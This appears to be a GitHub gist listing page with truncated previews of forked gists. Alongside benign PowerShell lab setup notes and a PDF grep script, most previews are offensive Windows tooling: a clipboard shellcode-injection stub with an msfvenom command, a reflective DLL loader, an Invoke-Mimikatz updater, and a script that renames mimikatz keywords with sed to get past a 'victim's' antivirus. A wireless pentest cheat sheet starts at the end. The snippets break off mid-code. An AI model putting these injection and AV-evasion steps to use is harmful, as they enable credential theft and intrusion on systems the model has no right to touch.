johnjohnsp1 /
Created Dec 12, 2021 — forked from jdhitsolutions/
Detailed instructions for setting up the PowerShellLab for my Pluralsight courses.

PowerShell Lab Detailed Setup Instructions

For my Pluralsight PowerShell courses, you are welcome to use any lab environment you wish. It should include an Active Directory domain with at least a domain controller, a Windows 10 client, and a Windows Server 2016 or 2019 member server. You will need to modify the course files to fit your environment. At this point in time, Windows Server 2022 remains untested for my labs.

However, I am going to recommend that you use a free PowerShell module called PSAutoLab. I encourage you to look at the README document on the project's GitHub repository before proceeding. If you need help with the module or its commands, you will use the repository's Issue section.


Please refer to this document to assist in installing and setting up the PSAutolab module on your computer. Run all commands from an elevated Windows PowerShell

johnjohnsp1 / ClippyShellcodeInject.cs
Created Nov 25, 2021 — forked from Wra7h/ClippyShellcodeInject.cs
Clipboard Shellcode Injection
// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Example: msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o <outputfile.bin>
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace ClippySCInject

Microsoft Defender for Endpoint does a great job of ensuring the integrity of the scripts they push and execute.

First, they ensure that the script to execute matches the expected file hash. Example:

powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command "& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7910.6064030.0.6552433-3a7d9fb541a03fc183f740777b7bb1aa20a20efd\046a3caf-d9ec-4da6-a32a-fb148992596a.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7910.6064030.0.6552433-3a7d9fb541a03fc183f740777b7bb1aa20a20efd\046a3caf-d9ec-4da6-a32a-fb148992596a.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'd871ab44a81b93cdf3c7e235c246ea8b4bf65d9141d7797270c15dd6bbdb2803'))
View ISeeSharpProcess.cs
using System;
using System.Diagnostics;
namespace ISeeSharpProcess
class Program
// Port of
static void GetCSharpProcess()
johnjohnsp1 / pdf-grep
Created Oct 16, 2020 — forked from ngregoire/pdf-grep
Grep through PDF files
# Three arguments: ROOT_DIR, PATTERN, OPTIONS
# Search below $ROOT_DIR for PDF files matching $PATTERN
# $OPTIONS is passed to pdfgrep (ex: grep-pdf . 'some words' -h -C5)
if [ -z "$1" ]; then
echo "! Argument ROOT_DIR is needed!"
View PsexecReflective.ps1
function reflectit
This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please read the Notes section (GENERAL NOTES) for information on how to use them.
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone windows
mv windows/mimikatz windows/windows
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
johnjohnsp1 / Invoke-UpdateMimikatzScript.ps1
Created Jul 29, 2020 — forked from ihack4falafel/Invoke-UpdateMimikatzScript.ps1
Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire
Invoke-UpdateMimikatzScript created by Hashim Jawad (@ihack4falafel)
Convert x64/x86 powerkatz.dll to Base64 string and then update Invoke-Mimikatz.ps1 script from Empire, see the link
Path to powerkatz.dll generated via Visual Studio.
Path to Invoke-Mimikatz.ps1 script.
View Wireless Penetration Testing Cheat

#Wireless Penetration Testing Cheat Sheet


  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up